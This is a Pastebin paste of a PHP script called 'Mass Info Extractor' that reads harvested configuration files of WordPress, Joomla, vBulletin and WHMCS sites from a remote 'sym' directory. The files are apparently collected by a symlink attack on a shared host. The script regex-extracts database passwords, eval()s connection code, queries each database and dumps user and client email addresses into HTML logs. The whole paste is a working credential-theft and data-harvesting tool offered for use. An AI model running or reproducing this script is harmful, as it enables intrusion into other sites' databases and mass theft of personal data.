Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- $h="<title>Mass Info Extractor (Coded RAB3OUN)</title>
- <pre>
- ___ ___ _____ __
- | \/ | |_ _| / _|
- | . . | __ _ ___ ___ | | _ __ | |_ ___
- | |\/| |/ _` / __/ __| | || '_ \| _/ _ \
- | | | | (_| \__ \__ \ _| || | | | || (_) |
- \_| |_/\__,_|___/___/ \___/_| |_|_| \___/
- _____ _ _
- | ___| | | | |
- | |____ _| |_ _ __ __ _ ___| |_ ___ _ __
- | __\ \/ / __| '__/ _` |/ __| __/ _ \| '__|
- | |___> <| |_| | | (_| | (__| || (_) | |
- \____/_/\_\\__|_| \__,_|\___|\__\___/|_|
- Coded by RAB3OUN
- </pre>";
- echo $h;
- $config = "http://site.com/sym/";
- ob_start();
- @set_time_limit(0);
- $i=0;
- $list[$i]['name']="Wordpress";
- $list[$i]['table']="users";
- $list[$i]['col']="user_email";
- $list[$i]['word']="wordpress";
- $list[$i]['code']='preg_match_all("#\'DB_.*\', \'(.*?)\'#",$file_source , $mysql_info);
- preg_match_all("#prefix = \'(.*?)\'#",$file_source , $__prefix);
- $faconnect=@mysql_connect($mysql_info[1][3],$mysql_info[1][1],$mysql_info[1][2]);
- $faselect=@mysql_select_db($mysql_info[1][0]);';
- $i++;
- $list[$i]['name']="Joomla";
- $list[$i]['table']="users";
- $list[$i]['col']="email";
- $list[$i]['word']="JConfig";
- $list[$i]['code']='
- preg_match_all(\'#\$host = \\\'(.*)\\\'#\',$file_source , $v1);
- preg_match_all(\'#\$user = \\\'(.*)\\\'#\',$file_source , $v2);
- preg_match_all(\'#\$password = \\\'(.*)\\\'#\',$file_source , $v3);
- preg_match_all(\'#\$db = \\\'(.*)\\\'#\',$file_source , $v4);
- preg_match_all(\'#\$dbprefix = \\\'(.*)\\\'#\',$file_source ,$__prefix);
- $faconnect=@mysql_connect($v1[1][0],$v2[1][0],$v3[1][0]);
- $faselect=@mysql_select_db($v4[1][0]);';
- $i++;
- $list[$i]['name']="vBulletin";
- $list[$i]['table']="user";
- $list[$i]['col']="email";
- $list[$i]['word']="vBulletin";
- $list[$i]['code']='preg_match_all(\'#\$config\[\\\'MasterServer\\\']\[\\\'servername\\\'] = \\\'(.*)\\\'#\',$file_source , $v1);
- preg_match_all(\'#\$config\[\\\'MasterServer\\\']\[\\\'username\\\'] = \\\'(.*)\\\'#\',$file_source , $v2);
- preg_match_all(\'#\$config\[\\\'MasterServer\\\']\[\\\'password\\\'] = \\\'(.*)\\\'#\',$file_source , $v3);
- preg_match_all(\'#\$config\[\\\'Database\\\']\[\\\'dbname\\\'] = \\\'(.*)\\\'#\',$file_source , $v4);
- preg_match_all(\'#\$config\[\\\'Database\\\']\[\\\'tableprefix\\\'] = \\\'(.*)\\\'#\',$file_source ,$__prefix);
- $faconnect=@mysql_connect($v1[1][0],$v2[1][0],$v3[1][0]) ;
- $faselect=@mysql_select_db($v4[1][0]) ;';
- $i++;
- $list[$i]['name']="WHMCS";
- $list[$i]['table']="tblclients";
- $list[$i]['col']="email";
- $list[$i]['word']="cc_encryption_hash";
- $list[$i]['code']='preg_match_all(\'#\$db_host = \\\'(.*)\\\'#\',$file_source , $v1);
- preg_match_all(\'#\$db_username = \\\'(.*)\\\'#\',$file_source , $v2);
- preg_match_all(\'#\$db_password = \\\'(.*)\\\'#\',$file_source , $v3);
- preg_match_all(\'#\$db_name = \\\'(.*)\\\'#\',$file_source , $v4);
- $__prefix="";
- $faconnect=@mysql_connect($v1[1][0],$v2[1][0],$v3[1][0]) ;
- $faselect=@mysql_select_db($v4[1][0]) ;';
- $x = file_get_contents2($config);
- preg_match_all('#href="(.*?).txt"#i',$x,$res);
- $total=count($res[1])-1;
- $cj = (isset($_GET['cj']) && $_GET['cj']!='') ? $_GET['cj'] : 0;
- for($j = $cj; $j <= $cj+50; $j++)
- {
- $file_name=@$res[1][$j];
- if ($file_name=="") {echo("The END");break;}
- $file_source = file_get_contents2($config.$file_name.".txt");
- echo "<hr>[*] ".$file_name;
- echo "<br> $j/$total";
- // echo $file_source;
- if ($file_source=="") continue;
- foreach ($list as $l)
- {
- if(ereg($l['word'],$file_source))
- {
- $mysql_info="";
- echo "<br>".$l[name];
- eval($l[code]);
- $prefix="";
- if (is_array($__prefix))
- {
- if (($__prefix[1][0])<>"") $prefix=$__prefix[1][0];
- }
- $table=$l['table'];
- $col=$l['col'];
- $x = @mysql_query("SELECT $col FROM ".$prefix.$table."") ;
- $t=0;
- while($x1 = @mysql_fetch_array($x,1)){
- $t++;
- r($l['name'],$col,$x1,$file_name);
- }
- echo "<br> Total mail $t";
- @mysql_close($faconnect);
- }
- }
- }
- $log=ob_get_contents();
- $fh2 = fopen("log.html", 'a') ;
- fwrite($fh2,$log);
- fclose($fh2);
- if ($_GET['cj']<$total){
- echo '<meta http-equiv="refresh" content="0;URL=?cj='.($_GET['cj']+50).'">' ;
- }
- function r($name,$col,$data,$o)
- {
- $c= "<tr>";
- foreach ($data as $x=>$y)
- {
- $c.= "<td>$y</td>\n";
- // }
- }
- $c.= "</tr>";
- if (file_exists("$name.html"))
- {
- $fh2 = fopen("$name.html", 'a') ;
- fwrite($fh2,$c);
- fclose($fh2);
- }
- else
- {
- $c="<br><table border=1><tr><td>".str_replace(",","</td><td>",$col)."</td></tr>".$c;
- $fh2 = fopen("$name.html", 'a') ;
- fwrite($fh2,$c);
- fclose($fh2);
- }
- }
- function file_get_contents2($url)
- {
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,trim($url));
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- $result = curl_exec($ch);
- echo curl_error($ch);
- return $result;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement